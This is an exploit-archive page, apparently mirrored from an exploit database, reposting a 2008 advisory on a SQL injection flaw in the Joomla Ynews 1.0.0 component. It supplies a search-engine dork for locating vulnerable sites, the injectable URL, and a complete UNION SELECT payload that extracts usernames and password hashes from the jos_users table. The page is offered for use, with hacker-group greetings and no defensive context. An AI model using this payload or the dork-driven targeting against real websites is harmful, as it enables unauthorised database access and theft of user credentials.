Joomla Component Ynews 1.0.0 (id) Remote SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Joomla Component Ynews 1.0.0 (id) Remote SQL Injection Vulnerability
# Published : 2008-02-06
# Author : Crackers_Child
# Previous Title : Astanda Directory Project 1.2 (link_id) SQL Injection Vulnerability
# Next Title : Mambo Component com_downloads Remote SQL Injection Vulnerability

###########################################################################################
###    Title   : Joomla Component Ynews 1.0.0  (id) Remote SQL Injection Vulnerability
###
###    Author  : By Crackers_Child cashr00t@hotmail.com
###
###    Greetz  : Str0ke,www.biyofrm.com & www.sibersavascilar.com & www.tryag.cc   
###                                      
###    Dork    : inurl:index.php?option=com_ynews
###
###    Exploit : /index.php?option=com_ynews&Itemid=0&task=showYNews&id=SQL
###      
###    SQL     : -1/**/union/**/select/**/0,1,2,username,password,5,6%20from%20jos_users/*
###
###    Note    : Kac Kere ??lDunuz ki " Olum Den Korkmuyorum Ben " Diyebiliyorsunuz . . .
###########################################################################################

# www.Syue.com [2008-02-06]